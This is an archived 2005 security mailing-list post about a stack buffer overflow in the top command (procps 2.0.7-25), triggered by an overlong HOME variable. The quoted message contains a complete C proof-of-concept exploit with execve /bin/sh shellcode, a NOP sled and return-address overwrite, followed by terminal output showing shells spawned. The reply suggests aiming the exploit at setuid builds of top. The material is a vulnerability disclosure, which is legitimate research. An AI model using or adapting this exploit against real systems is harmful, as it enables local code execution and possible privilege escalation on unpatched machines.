Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: top (procps-2.0.7-25) vulnerability

From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Mon, 09 May 2005 11:36:09 -0400

Sheesh what is with top and folks not fixing OLD arse bugs. =]
You may wanna check with William LeFebvre and make sure this issue is fixed in his latest code base.
Sun freeware ships top as setuid... you may wanna try to exploit this bug there. It *may* not be fixed. 

Look familiar?
http://www.securiteam.com/exploits/5JP0A2A2BW.html

-KF


WINNY THOMAS wrote:
While running top on a tool of mine to do a profiling test the top command ran into a segmentation fault. I 
could find two instance where the command could
misbehave

1.                   if you have junk data inside a
file .toprc in your home directory
2.                   if your environmental variable
HOME is set to a string that’s greater than 1024.

I managed to spawn a shell out of top command by
exploiting the second issue. If you compile and run
the exploit code which I am including in the mail body
you will get a shell. Incase you don’t you could pass
parameters to the program as follows to adjust the
offset. The vulnerability detail is included in the code 
comment

[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit

in most of the test I did on the vulnerable code I got
shell on my system without passing any parameter to
the program (that is the hardcoded offset of 1111 in
my program worked well on my system)

/*
* Program: Proof of concept code for top exploit
* Author: Winny Thomas, Nevis networks pune
* Vulerability: in top.c the function get_options
uses strcpy to copy the value of the * environment variable HOME into a static buffer that is allocated on the stack. hence * its possible to apply standard stack smashing attack to overwrite the return address * on the stack and execute a code which is of the 
attackers choice
*       NOTE: top is not setuid and hence the exploit wont
spawn a root shell. * Tested on Red Hat 8 with procps verion 2.0.7-25. the problem has * been fixed in the latest versions 
*
* This code is for educational purpose only and the * author shall not bear any responsibility for any * damage caused by using this code 
*/

#include <stdio.h>
#include <stdlib.h>

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

char exploit_variable[1200];

long get_esp(void)
{
       __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
       long stackp, retaddr;
       char SETENV[1250];
       long *ptr;
       int i, j, offset = 1111;

       if (argc > 1)
           offset = atoi(argv[1]);

       stackp = get_esp();
       retaddr = stackp - offset;

       ptr = exploit_variable;
       for (i = 0; i < 1200; i += 4)
           *ptr++ = retaddr;
for (i = 0; i < 600; i++) exploit_variable[i] = '\x90'; 

       for (j = 0 ;j < strlen(shellcode); j++, i++)
           exploit_variable[i] = shellcode[j];

       sprintf(SETENV, "HOME=");
       strcat(SETENV, exploit_variable);
       putenv(SETENV);
       execl("/usr/bin/top", "top", (char *)0);
}
__________________________________ Do you Yahoo!? Make Yahoo! your home page http://www.yahoo.com/r/hs
Previous By Date Next
Previous By Thread Next

Current thread: